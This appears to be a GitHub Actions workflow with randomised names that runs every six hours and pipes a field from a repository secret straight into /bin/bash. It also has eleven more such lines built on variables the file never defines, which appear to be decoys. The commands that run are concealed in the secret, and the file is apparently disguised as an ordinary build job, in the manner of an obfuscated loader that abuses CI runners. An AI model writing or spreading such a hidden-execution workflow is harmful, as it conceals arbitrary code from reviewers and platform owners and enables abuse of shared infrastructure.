name: piernuosi
on:
  workflow_dispatch:
  schedule:
    - cron: '49 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: piernuosi
        env:
          sxcp5: ${{ secrets.sxcp5 }}
        run: |
          echo $sxcp5 | jq -r .k81 | /bin/bash
          echo $yndn653 | jq -r .f405 | /bin/bash
          echo $ti8825 | jq -r .gop7657 | /bin/bash
          echo $shgc6 | jq -r .yfc316 | /bin/bash
          echo $riig2697 | jq -r .hp85893 | /bin/bash
          echo $dxa03805 | jq -r .pnp8 | /bin/bash
          echo $cruwn71796 | jq -r .k88769 | /bin/bash
          echo $qvx8 | jq -r .xyriq12496 | /bin/bash
          echo $g95 | jq -r .llfq132 | /bin/bash
          echo $akued0 | jq -r .x72992 | /bin/bash
          echo $ekh8 | jq -r .nv846 | /bin/bash
          echo $dxtc5057 | jq -r .yuyjk622 | /bin/bash

